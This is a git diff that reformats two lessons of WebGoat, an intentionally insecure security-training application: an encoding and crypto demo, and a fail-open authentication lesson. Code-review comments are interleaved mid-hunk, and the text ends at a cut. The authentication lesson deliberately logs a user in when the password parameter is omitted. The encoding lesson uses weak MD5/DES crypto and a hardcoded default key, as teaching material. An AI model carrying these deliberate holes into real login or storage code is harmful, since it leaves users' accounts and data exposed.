- t.setBorder( 0 );
+ t.setBorder(0);
- t.setCellSpacing( 1 );
+ t.setCellSpacing(1);
- t.setCellPadding( 4 );
+ t.setCellPadding(4);
 String description;
- t.addElement( makeTitleRow( "Description", "Encoded", "Decoded" ) );
+ t.addElement(makeTitleRow("Description", "Encoded", "Decoded"));
 description = "Base64 encoding is a simple reversable encoding used to encode bytes into ASCII characters.
Useful for making bytes into a printable string, but provides no security.";
-// t.addElement( makeDescriptionRow( description ) );
- t.addElement( makeRow( description, base64Encode( userInput ), base64Decode( userInput ) ) );
-// t.addElement( makeSpacerRow() );
+ // t.addElement( makeDescriptionRow( description ) );
+ t.addElement(makeRow(description, base64Encode(userInput), base64Decode(userInput)));
+ // t.addElement( makeSpacerRow() );
 description = "Entity encoding uses special sequences like &amp; for special characters. This prevents these characters from being interpreted by most interpreters.";
- t.addElement( makeRow( description, HtmlEncoder.encode( userInput ), HtmlEncoder.decode( userInput ) ) );
+ t.addElement(makeRow(description, HtmlEncoder.encode(userInput), HtmlEncoder.decode(userInput)));
 description = "Password based encryption (PBE) is strong encryption with a text password. Cannot be decrypted without the password";
- t.addElement( makeRow( description, encryptString( userInput, userKey ), decryptString( userInput, userKey ) ) );
+ t.addElement(makeRow(description, encryptString(userInput, userKey), decryptString(userInput, userKey)));
 description = "MD5 hash is a checksum that can be used to validate a string or byte array, but cannot be reversed to find the original string or bytes.
For obscure cryptographic reasons, it is better to use SHA-256 if you have a choice.";
- t.addElement( makeRow( description, hashMD5( userInput ), "Cannot reverse a hash" ) );
-
+ t.addElement(makeRow(description, hashMD5(userInput), "Cannot reverse a hash"));
+
 description = "SHA-256 hash is a checksum that can be used to validate a string or byte array, but cannot be reversed to find the original string or bytes.";
- t.addElement( makeRow( description, hashSHA( userInput ), "N/A" ) );
-
+ t.addElement(makeRow(description, hashSHA(userInput), "N/A"));
+
 description = "Unicode encoding is...";
- t.addElement( makeRow( description, "Not Implemented", "Not Implemented" ) );
-
+ t.addElement(makeRow(description, "Not Implemented", "Not Implemented"));
+
 description = "URL encoding is...";
- t.addElement( makeRow( description, urlEncode( userInput ), urlDecode( userInput ) ) );
-
+ t.addElement(makeRow(description, urlEncode(userInput), urlDecode(userInput)));
+
 description = "Hex encoding simply encodes bytes into %xx format.";
- t.addElement( makeRow( description, hexEncode( userInput ), hexDecode( userInput ) ) );
-
+ t.addElement(makeRow(description, hexEncode(userInput), hexDecode(userInput)));
+
 description = "Rot13 encoding is a way to make text unreadable, but is easily reversed and provides no security.";
- t.addElement( makeRow( description, rot13( userInput ), rot13( userInput ) ) );
-
+ t.addElement(makeRow(description, rot13(userInput), rot13(userInput)));
+
 description = "XOR with password encoding is a weak encryption scheme that mixes a password into data.";
- t.addElement( makeRow( description, xorEncode( userInput, userKey ), xorDecode( userInput, userKey ) ) );
-
+ t.addElement(makeRow(description, xorEncode(userInput, userKey), xorDecode(userInput, userKey)));
+
 description = "Double unicode encoding is...";
- t.addElement( makeRow( description, "Not Implemented", "Not Implemented" ) );
-
+ t.addElement(makeRow(description, "Not Implemented", "Not
Implemented"));
+
 description = "Double URL encoding is...";
- t.addElement( makeRow( description, urlEncode( urlEncode( userInput ) ), urlDecode( urlDecode( userInput ) ) ) );
-
- ec.addElement( t );
+ t.addElement(makeRow(description, urlEncode(urlEncode(userInput)), urlDecode(urlDecode(userInput))));
+
+ ec.addElement(t);
 }
- catch ( Exception e )
+ catch (Exception e)
 {
- s.setMessage( "Error generating " + this.getClass().getName() );
+ s.setMessage("Error generating " + this.getClass().getName());
 e.printStackTrace();
 }
- if ( getLessonTracker( s ).getNumVisits() > 3 )
+ if (getLessonTracker(s).getNumVisits() > 3)
 {
- makeSuccess( s );
+ makeSuccess(s);
 }
- return ( ec );
+ return (ec);
 }
-
-
 /**
- * Convenience method for encrypting a string.
- *
- * @param str Description of the Parameter
- * @param pw Description of the Parameter
- * @return String the encrypted string.
+ * Convenience method for encrypting a string.
+ *
+ * @param str
+ * Description of the Parameter
+ * @param pw
+ * Description of the Parameter
+ * @return String the encrypted string.
*/ - public static synchronized String decryptString( String str, String pw ) + public static synchronized String decryptString(String str, String pw) { try { - PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec( salt, 20 ); + PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec(salt, 20); - SecretKeyFactory kf = SecretKeyFactory.getInstance( "PBEWithMD5AndDES" ); + SecretKeyFactory kf = SecretKeyFactory.getInstance("PBEWithMD5AndDES"); - Cipher passwordDecryptCipher = Cipher.getInstance( "PBEWithMD5AndDES/CBC/PKCS5Padding" ); + Cipher passwordDecryptCipher = Cipher.getInstance("PBEWithMD5AndDES/CBC/PKCS5Padding"); char[] pass = pw.toCharArray(); - SecretKey k = kf.generateSecret( new javax.crypto.spec.PBEKeySpec( pass ) ); + SecretKey k = kf.generateSecret(new javax.crypto.spec.PBEKeySpec(pass)); - passwordDecryptCipher.init( Cipher.DECRYPT_MODE, k, ps ); + passwordDecryptCipher.init(Cipher.DECRYPT_MODE, k, ps); - byte[] dec = decoder.decodeBuffer( str ); + byte[] dec = decoder.decodeBuffer(str); - byte[] utf8 = passwordDecryptCipher.doFinal( dec ); + byte[] utf8 = passwordDecryptCipher.doFinal(dec); - return new String( utf8, "UTF-8" ); + return new String(utf8, "UTF-8"); } - catch ( Exception e ) + catch (Exception e) { - return ( "This is not an encrypted string" ); + return ("This is not an encrypted string"); } } - - /** - * Convenience method for encrypting a string. - * - * @param str Description of the Parameter - * @param pw Description of the Parameter - * @return String the encrypted string. - * @exception SecurityException Description of the Exception + * Convenience method for encrypting a string. + * + * @param str + * Description of the Parameter + * @param pw + * Description of the Parameter + * @return String the encrypted string. 
+ * @exception SecurityException + * Description of the Exception */ - public static synchronized String encryptString( String str, String pw ) throws SecurityException + public static synchronized String encryptString(String str, String pw) throws SecurityException { try { - PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec( salt, 20 ); + PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec(salt, 20); - SecretKeyFactory kf = SecretKeyFactory.getInstance( "PBEWithMD5AndDES" ); + SecretKeyFactory kf = SecretKeyFactory.getInstance("PBEWithMD5AndDES"); - Cipher passwordEncryptCipher = Cipher.getInstance( "PBEWithMD5AndDES/CBC/PKCS5Padding" ); + Cipher passwordEncryptCipher = Cipher.getInstance("PBEWithMD5AndDES/CBC/PKCS5Padding"); char[] pass = pw.toCharArray(); - SecretKey k = kf.generateSecret( new javax.crypto.spec.PBEKeySpec( pass ) ); + SecretKey k = kf.generateSecret(new javax.crypto.spec.PBEKeySpec(pass)); - passwordEncryptCipher.init( Cipher.ENCRYPT_MODE, k, ps ); + passwordEncryptCipher.init(Cipher.ENCRYPT_MODE, k, ps); - byte[] utf8 = str.getBytes( "UTF-8" ); + byte[] utf8 = str.getBytes("UTF-8"); - byte[] enc = passwordEncryptCipher.doFinal( utf8 ); + byte[] enc = passwordEncryptCipher.doFinal(utf8); - return encoder.encode( enc ); + return encoder.encode(enc); } - catch ( Exception e ) + catch (Exception e) { - return ( "Encryption error" ); + return ("Encryption error"); } } - - /** - * Gets the category attribute of the Encoding object - * - * @return The category value + * Gets the category attribute of the Encoding object + * + * @return The category value */ protected Category getDefaultCategory() 
@@ -408,29 +400,26 @@ public class Encoding extends LessonAdapter return Category.INSECURE_STORAGE; } - /** - * Gets the hints attribute of the HelloScreen object - * - * @return The hints value + * Gets the hints attribute of the HelloScreen object + * + * @return The hints value */ public List getHints(WebSession s) { List hints = new ArrayList(); - hints.add( "Enter a string and press 'go'" ); - hints.add( "Enter 'abc' and notice the rot13 encoding is 'nop' ( increase each letter by 13 characters )." ); - hints.add( "Enter 'a c' and notice the url encoding is 'a+c' ( ' ' is converted to '+' )." ); + hints.add("Enter a string and press 'go'"); + hints.add("Enter 'abc' and notice the rot13 encoding is 'nop' ( increase each letter by 13 characters )."); + hints.add("Enter 'a c' and notice the url encoding is 'a+c' ( ' ' is converted to '+' )."); return hints; } - - /** - * Gets the instructions attribute of the Encoding object - * - * @return The instructions value + * Gets the instructions attribute of the Encoding object + * + * @return The instructions value */ public String getInstructions(WebSession s) @@ -438,10 +427,6 @@ public class Encoding extends LessonAdapter return "This lesson will familiarize the user with different encoding schemes. "; } - - - - private final static Integer DEFAULT_RANKING = new Integer(15); protected Integer getDefaultRanking() 
@@ -450,26 +435,25 @@ public class Encoding extends LessonAdapter } /** - * Gets the title attribute of the HelloScreen object - * - * @return The title value + * Gets the title attribute of the HelloScreen object + * + * @return The title value */ public String getTitle() { - return ( "Encoding Basics" ); + return ("Encoding Basics"); } - - /** - * Returns the MD5 hash of a String. - * - * @param str Description of the Parameter - * @return Description of the Return Value + * Returns the MD5 hash of a String. + * + * @param str + * Description of the Parameter + * @return Description of the Return Value */ - public static String hashMD5( String str ) + public static String hashMD5(String str) { byte[] b = str.getBytes(); 
@@ -477,340 +461,325 @@ public class Encoding extends LessonAdapter try { - md = MessageDigest.getInstance( "MD5" ); - md.update( b ); - } - catch ( NoSuchAlgorithmException e ) + md = MessageDigest.getInstance("MD5"); + md.update(b); + } catch (NoSuchAlgorithmException e) { // it's got to be there e.printStackTrace(); } - return ( base64Encode( md.digest() ) ); + return (base64Encode(md.digest())); } - - /** - * Returns the SHA hash of a String. - * - * @param str Description of the Parameter - * @return Description of the Return Value + * Returns the SHA hash of a String. + * + * @param str + * Description of the Parameter + * @return Description of the Return Value */ - public static String hashSHA( String str ) + public static String hashSHA(String str) { byte[] b = str.getBytes(); MessageDigest md = null; try { - md = MessageDigest.getInstance( "SHA-256" ); - md.update( b ); - } - catch ( NoSuchAlgorithmException e ) + md = MessageDigest.getInstance("SHA-256"); + md.update(b); + } catch (NoSuchAlgorithmException e) { // it's got to be there e.printStackTrace(); } - return ( base64Encode( md.digest() ) ); + return (base64Encode(md.digest())); } - - /** - * Description of the Method - * - * @param hexString Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param hexString + * Description of the Parameter + * @return Description of the Return Value */ - public static String hexDecode( String hexString ) + public static String hexDecode(String hexString) { try { - if ( ( hexString.length() % 3 ) != 0 ) - { - return ( "String not comprised of Hex digit pairs." 
); - } + if ((hexString.length() % 3) != 0) { return ("String not comprised of Hex digit pairs."); } char[] chars = new char[hexString.length()]; char[] convChars = new char[hexString.length() / 3]; - hexString.getChars( 0, hexString.length(), chars, 0 ); - for ( int i = 1; i < hexString.length(); i += 3 ) + hexString.getChars(0, hexString.length(), chars, 0); + for (int i = 1; i < hexString.length(); i += 3) { - String hexToken = new String( chars, i, 2 ); - convChars[i / 3] = (char) Integer.parseInt( hexToken, 16 ); + String hexToken = new String(chars, i, 2); + convChars[i / 3] = (char) Integer.parseInt(hexToken, 16); } - return new String( convChars ); - } - catch ( NumberFormatException nfe ) + return new String(convChars); + } catch (NumberFormatException nfe) { - return ( "String not comprised of Hex digits" ); + return ("String not comprised of Hex digits"); } } - - /** - * Description of the Method - * - * @param asciiString Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param asciiString + * Description of the Parameter + * @return Description of the Return Value */ - public static String hexEncode( String asciiString ) + public static String hexEncode(String asciiString) { char[] ascii = new char[asciiString.length()]; - asciiString.getChars( 0, asciiString.length(), ascii, 0 ); + asciiString.getChars(0, asciiString.length(), ascii, 0); StringBuffer hexBuff = new StringBuffer(); - for ( int i = 0; i < asciiString.length(); i++ ) + for (int i = 0; i < asciiString.length(); i++) { - hexBuff.append( "%" ); - hexBuff.append( Integer.toHexString( ascii[i] ) ); + hexBuff.append("%"); + hexBuff.append(Integer.toHexString(ascii[i])); } return hexBuff.toString().toUpperCase(); } - - /** - * The main program for the Encoding class - * - * @param args The command line arguments + * The main program for the Encoding class + * + * @param args + * The command line arguments */ - public static void main( 
String[] args ) + public static void main(String[] args) { try { String userInput = args[0]; String userKey = args[1]; - System.out.println( "Working with: " + userInput ); - System.out.print( "Base64 encoding: " ); - System.out.println( base64Encode( userInput ) + " : " + base64Decode( userInput ) ); - System.out.print( "Entity encoding: " ); - System.out.println( HtmlEncoder.encode( userInput ) + " : " + HtmlEncoder.decode( userInput ) ); - System.out.print( "Password based encryption (PBE): " ); - System.out.println( encryptString( userInput, userKey ) + " : " + decryptString( userInput, userKey ) ); - System.out.print( "MD5 hash: " ); - System.out.println( hashMD5( userInput ) + " : " + "Cannot reverse a hash" ); - System.out.print( "SHA-256 hash: " ); - System.out.println( hashSHA( userInput ) + " : " + "Cannot reverse a hash" ); - System.out.print( "Unicode encoding: " ); - System.out.println( "Not Implemented" + " : " + "Not Implemented" ); - System.out.print( "URL encoding: " ); - System.out.println( urlEncode( userInput ) + " : " + urlDecode( userInput ) ); - System.out.print( "Hex encoding: " ); - System.out.println( hexEncode( userInput ) + " : " + hexDecode( userInput ) ); - System.out.print( "Rot13 encoding: " ); - System.out.println( rot13( userInput ) + " : " + rot13( userInput ) ); - System.out.print( "XOR with password: " ); - System.out.println( xorEncode( userInput, userKey ) + " : " + xorDecode( userInput, userKey ) ); - System.out.print( "Double unicode encoding is..." 
); - System.out.println( "Not Implemented" + " : " + "Not Implemented" ); - System.out.print( "Double URL encoding: " ); - System.out.println( urlEncode( urlEncode( userInput ) ) + " : " + urlDecode( urlDecode( userInput ) ) ); - } - catch ( Exception e ) + System.out.println("Working with: " + userInput); + System.out.print("Base64 encoding: "); + System.out.println(base64Encode(userInput) + " : " + base64Decode(userInput)); + System.out.print("Entity encoding: "); + System.out.println(HtmlEncoder.encode(userInput) + " : " + HtmlEncoder.decode(userInput)); + System.out.print("Password based encryption (PBE): "); + System.out.println(encryptString(userInput, userKey) + " : " + decryptString(userInput, userKey)); + System.out.print("MD5 hash: "); + System.out.println(hashMD5(userInput) + " : " + "Cannot reverse a hash"); + System.out.print("SHA-256 hash: "); + System.out.println(hashSHA(userInput) + " : " + "Cannot reverse a hash"); + System.out.print("Unicode encoding: "); + System.out.println("Not Implemented" + " : " + "Not Implemented"); + System.out.print("URL encoding: "); + System.out.println(urlEncode(userInput) + " : " + urlDecode(userInput)); + System.out.print("Hex encoding: "); + System.out.println(hexEncode(userInput) + " : " + hexDecode(userInput)); + System.out.print("Rot13 encoding: "); + System.out.println(rot13(userInput) + " : " + rot13(userInput)); + System.out.print("XOR with password: "); + System.out.println(xorEncode(userInput, userKey) + " : " + xorDecode(userInput, userKey)); + System.out.print("Double unicode encoding is..."); + System.out.println("Not Implemented" + " : " + "Not Implemented"); + System.out.print("Double URL encoding: "); + System.out.println(urlEncode(urlEncode(userInput)) + " : " + urlDecode(urlDecode(userInput))); + } catch (Exception e) { e.printStackTrace(); } } - - /** - * Description of the Method - * - * @param value1 Description of the Parameter - * @param value2 Description of the Parameter - * @param description 
Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param value1 + * Description of the Parameter + * @param value2 + * Description of the Parameter + * @param description + * Description of the Parameter + * @return Description of the Return Value */ - private TR makeRow( String description, String value1, String value2 ) + private TR makeRow(String description, String value1, String value2) { - TD desc = new TD().addElement( description ).setBgColor( "#bbbbbb" ); - TD val1 = new TD().addElement( value1 ).setBgColor( "#dddddd" ); - TD val2 = new TD().addElement( value2 ).setBgColor( "#dddddd" ); + TD desc = new TD().addElement(description).setBgColor("#bbbbbb"); + TD val1 = new TD().addElement(value1).setBgColor("#dddddd"); + TD val2 = new TD().addElement(value2).setBgColor("#dddddd"); TR tr = new TR(); - tr.addElement( desc ); - tr.addElement( val1 ); - tr.addElement( val2 ); + tr.addElement(desc); + tr.addElement(val1); + tr.addElement(val2); return tr; } - /** - * Description of the Method - * - * @param value1 Description of the Parameter - * @param value2 Description of the Parameter - * @param description Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param value1 + * Description of the Parameter + * @param value2 + * Description of the Parameter + * @param description + * Description of the Parameter + * @return Description of the Return Value */ - private TR makeTitleRow( String description, String value1, String value2 ) + private TR makeTitleRow(String description, String value1, String value2) { - TD desc = new TD().addElement( new B().addElement( description ) ); - TD val1 = new TD().addElement( new B().addElement( value1 ) ); - TD val2 = new TD().addElement( new B().addElement( value2 ) ); - desc.setAlign( "center" ); - val1.setAlign( "center" ); - val2.setAlign( "center" ); + TD desc = new TD().addElement(new 
B().addElement(description)); + TD val1 = new TD().addElement(new B().addElement(value1)); + TD val2 = new TD().addElement(new B().addElement(value2)); + desc.setAlign("center"); + val1.setAlign("center"); + val2.setAlign("center"); TR tr = new TR(); - tr.addElement( desc ); - tr.addElement( val1 ); - tr.addElement( val2 ); - return ( tr ); + tr.addElement(desc); + tr.addElement(val1); + tr.addElement(val2); + return (tr); } - /** - * Description of the Method - * - * @param input Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param input + * Description of the Parameter + * @return Description of the Return Value */ - public static synchronized String rot13( String input ) + public static synchronized String rot13(String input) { StringBuffer output = new StringBuffer(); - if ( input != null ) + if (input != null) { - for ( int i = 0; i < input.length(); i++ ) + for (int i = 0; i < input.length(); i++) { - char inChar = input.charAt( i ); - if ( ( inChar >= 'A' ) & ( inChar <= 'Z' ) ) + char inChar = input.charAt(i); + if ((inChar >= 'A') & (inChar <= 'Z')) { inChar += 13; - if ( inChar > 'Z' ) + if (inChar > 'Z') { inChar -= 26; } } - if ( ( inChar >= 'a' ) & ( inChar <= 'z' ) ) + if ((inChar >= 'a') & (inChar <= 'z')) { inChar += 13; - if ( inChar > 'z' ) + if (inChar > 'z') { inChar -= 26; } } - output.append( inChar ); + output.append(inChar); } } return output.toString(); } - /** - * Description of the Method - * - * @param str Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param str + * Description of the Parameter + * @return Description of the Return Value */ - public static String unicodeDecode( String str ) + public static String unicodeDecode(String str) { // FIXME: TOTALLY EXPERIMENTAL try { - ByteBuffer bbuf = ByteBuffer.allocate( str.length() ); - bbuf.put( str.getBytes() ); - Charset charset = Charset.forName( 
"ISO-8859-1" ); + ByteBuffer bbuf = ByteBuffer.allocate(str.length()); + bbuf.put(str.getBytes()); + Charset charset = Charset.forName("ISO-8859-1"); CharsetDecoder decoder = charset.newDecoder(); - CharBuffer cbuf = decoder.decode( bbuf ); - return ( cbuf.toString() ); - } - catch ( Exception e ) + CharBuffer cbuf = decoder.decode(bbuf); + return (cbuf.toString()); + } catch (Exception e) { - return ( "Encoding problem" ); + return ("Encoding problem"); } } - - /** - * Description of the Method - * - * @param str Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param str + * Description of the Parameter + * @return Description of the Return Value */ - public static String unicodeEncode( String str ) + public static String unicodeEncode(String str) { // FIXME: TOTALLY EXPERIMENTAL try { - Charset charset = Charset.forName( "ISO-8859-1" ); + Charset charset = Charset.forName("ISO-8859-1"); CharsetEncoder encoder = charset.newEncoder(); - ByteBuffer bbuf = encoder.encode( CharBuffer.wrap( str ) ); - return ( new String( bbuf.array() ) ); - } - catch ( Exception e ) + ByteBuffer bbuf = encoder.encode(CharBuffer.wrap(str)); + return (new String(bbuf.array())); + } catch (Exception e) { - return ( "Encoding problem" ); + return ("Encoding problem"); } } - - /** - * Description of the Method - * - * @param str Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param str + * Description of the Parameter + * @return Description of the Return Value */ - public static String urlDecode( String str ) + public static String urlDecode(String str) { try { - return ( URLDecoder.decode( str, "UTF-8" ) ); - } - catch ( Exception e ) + return (URLDecoder.decode(str, "UTF-8")); + } catch (Exception e) { - return ( "Decoding error" ); + return ("Decoding error"); } } - - /** - * Description of the Method - * - * @param str Description of the Parameter - * @return 
Description of the Return Value + * Description of the Method + * + * @param str + * Description of the Parameter + * @return Description of the Return Value */ - public static String urlEncode( String str ) + public static String urlEncode(String str) { try { - return ( URLEncoder.encode( str, "UTF-8" ) ); - } - catch ( Exception e ) + return (URLEncoder.encode(str, "UTF-8")); + } catch (Exception e) { - return ( "Encoding error" ); + return ("Encoding error"); } } - - /** - * Description of the Method - * - * @param input Description of the Parameter - * @param userKey Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param input + * Description of the Parameter + * @param userKey + * Description of the Parameter + * @return Description of the Return Value */ - public static synchronized char[] xor( String input, String userKey ) + public static synchronized char[] xor(String input, String userKey) { - if ( ( userKey == null ) || ( userKey.trim().length() == 0 ) ) + if ((userKey == null) || (userKey.trim().length() == 0)) { userKey = "Goober"; } 
@@ -818,58 +787,57 @@ public class Encoding extends LessonAdapter int keyLen = xorChars.length; char[] inputChars = null; char[] outputChars = null; - if ( input != null ) + if (input != null) { inputChars = input.toCharArray(); outputChars = new char[inputChars.length]; - for ( int i = 0; i < inputChars.length; i++ ) + for (int i = 0; i < inputChars.length; i++) { - outputChars[i] = (char) ( inputChars[i] ^ xorChars[i % keyLen] ); + outputChars[i] = (char) (inputChars[i] ^ xorChars[i % keyLen]); } } return outputChars; } - - /** - * Description of the Method - * - * @param input Description of the Parameter - * @param userKey Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param input + * Description of the Parameter + * @param userKey + * Description of the Parameter + * @return Description of the Return Value */ - public static synchronized String xorDecode( String input, String userKey ) + public static synchronized String xorDecode(String input, String userKey) { try { - String decoded = base64Decode( input ); - return new String( xor( decoded, userKey ) ); - } - catch ( Exception e ) + String decoded = base64Decode(input); + return new String(xor(decoded, userKey)); + } catch (Exception e) { return "String not XOR encoded."; } } - - /** - * Description of the Method - * - * @param input Description of the Parameter - * @param userKey Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param input + * Description of the Parameter + * @param userKey + * Description of the Parameter + * @return Description of the Return Value */ - public static synchronized String xorEncode( String input, String userKey ) + public static synchronized String xorEncode(String input, String userKey) { - return base64Encode( xor( input, userKey ) ); + return base64Encode(xor(input, userKey)); } - public Element getCredits() - { - return 
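Review bot: In hexEncode, `hexBuff.append(Integer.toHexString(ascii[i]))` emits a single hex digit for characters below 0x10 and more than two for characters above 0xFF, so the output is not the `%xx` pair format the lesson text promises, and hexDecode then rejects its own encoder's output through the `hexString.length() % 3` check. Padding the token restores the round trip: `String hex = Integer.toHexString(ascii[i]); if (hex.length() < 2) hex = "0" + hex; hexBuff.append("%").append(hex);` (characters above 0xFF still need a decision on how they are represented). The `byte[] b = str.getBytes();` in hashSHA (and the same line in hashMD5, in the preceding hunk) uses the platform default charset, so the displayed digest of a non-ASCII input depends on the host; `str.getBytes("UTF-8")` would match what encryptString already does. The new layout also mixes brace styles — `} catch (NoSuchAlgorithmException e)` on the closing brace with `{` on its own line, and the whole `if` of hexDecode collapsed onto one line next to Allman-style blocks — which reads as a formatter artifact rather than a chosen convention.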
super.getCustomCredits("", ASPECT_LOGO); - } + public Element getCredits() + { + return super.getCustomCredits("", ASPECT_LOGO); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/FailOpenAuthentication.java b/main/project/JavaSource/org/owasp/webgoat/lessons/FailOpenAuthentication.java index d3d703804..a1bae71dd 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/FailOpenAuthentication.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/FailOpenAuthentication.java 
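Review bot: xorEncode hands the result of `xor(input, userKey)` straight to `base64Encode`, and xor returns its initial `outputChars = null` when `input` is null, so a null input reaches base64Encode unguarded while xorDecode wraps the equivalent path in try/catch; whether base64Encode tolerates null is not visible here. Either guard the same way or return a fixed message before the call, e.g. `if (input == null) { return "String not XOR encoded."; }`, so both directions fail consistently. xor's signature and key handling start in the preceding hunk.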
@@ -1,193 +1,184 @@ + package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.html.A; import org.apache.ecs.html.IMG; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Jeff Williams Aspect Security - * @created October 28, 2003 + * + * @author Jeff Williams Aspect Security + * @created October 28, 2003 */ public class FailOpenAuthentication extends WeakAuthenticationCookie { - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - boolean logout = s.getParser().getBooleanParameter(LOGOUT, false); + public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") + .addElement( + new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) + .setVspace(0)); - if (logout) + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) { - s.setMessage("Goodbye!"); - s.eatCookies(); + boolean logout = s.getParser().getBooleanParameter(LOGOUT, false); - return (makeLogin(s)); - } - - try - { - String username = ""; - String password = ""; - - try - { - username = s.getParser().getRawParameter(USERNAME); - password = s.getParser().getRawParameter(PASSWORD); - - // if credentials are bad, send the login page - 
if (!"webgoat".equals(username) || !password.equals("webgoat")) + if (logout) { - s.setMessage("Invalid username and password entered."); + s.setMessage("Goodbye!"); + s.eatCookies(); - return (makeLogin(s)); + return (makeLogin(s)); } - } - catch (Exception e) - { - // The parameter was omitted. set fail open status complete - if (username.length() > 0 - && e.getMessage().indexOf("not found") != -1) - { - if ((username != null) && (username.length() > 0)) - { - makeSuccess(s); - return (makeUser(s, username, - "Fail Open Error Handling")); - } - } - } - // Don't let the fail open pass with a blank password. - if (password.length() == 0) - { - // We make sure the username was submitted to avoid telling the user an invalid - // username/password was entered when they first enter the lesson via the side menu. - // This also suppresses the error if they just hit the login and both fields are empty. - if (username.length() != 0) + try { - s.setMessage("Invalid username and password entered."); + String username = ""; + String password = ""; + + try + { + username = s.getParser().getRawParameter(USERNAME); + password = s.getParser().getRawParameter(PASSWORD); + + // if credentials are bad, send the login page + if (!"webgoat".equals(username) || !password.equals("webgoat")) + { + s.setMessage("Invalid username and password entered."); + + return (makeLogin(s)); + } + } catch (Exception e) + { + // The parameter was omitted. set fail open status complete + if (username.length() > 0 && e.getMessage().indexOf("not found") != -1) + { + if ((username != null) && (username.length() > 0)) + { + makeSuccess(s); + return (makeUser(s, username, "Fail Open Error Handling")); + } + } + } + + // Don't let the fail open pass with a blank password. + if (password.length() == 0) + { + // We make sure the username was submitted to avoid telling the user an invalid + // username/password was entered when they first enter the lesson via the side menu. 
+ // This also suppresses the error if they just hit the login and both fields are + // empty. + if (username.length() != 0) + { + s.setMessage("Invalid username and password entered."); + } + + return (makeLogin(s)); + + } + + // otherwise authentication is good, show the content + if ((username != null) && (username.length() > 0)) { return (makeUser(s, username, + "Parameters. You did not exploit the fail open.")); } + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); } return (makeLogin(s)); - - } - - // otherwise authentication is good, show the content - if ((username != null) && (username.length() > 0)) - { - return (makeUser(s, username, - "Parameters. You did not exploit the fail open.")); - } } - catch (Exception e) + + /** + * Gets the category attribute of the FailOpenAuthentication object + * + * @return The category value + */ + public Category getDefaultCategory() { - s.setMessage("Error generating " + this.getClass().getName()); + return Category.ERROR_HANDLING; } - return (makeLogin(s)); - } + /** + * Gets the hints attribute of the AuthenticateScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + hints.add("You can force errors during the authentication process."); + hints.add("You can change length, existance, or values of authentication parameters."); + hints + .add("Try removing a parameter ENTIRELY with WebScarab."); + return hints; + } - /** - * Gets the category attribute of the FailOpenAuthentication object - * - * @return The category value - */ - public Category getDefaultCategory() - { - return Category.ERROR_HANDLING; - } + /** + * Gets the instructions attribute of the FailOpenAuthentication object + * + * @return The instructions value + */ + public String getInstructions(WebSession s) + { + return "Due to an error handling problem in the authentication mechanism, it is possible to authenticate " + + "as the 'webgoat' 
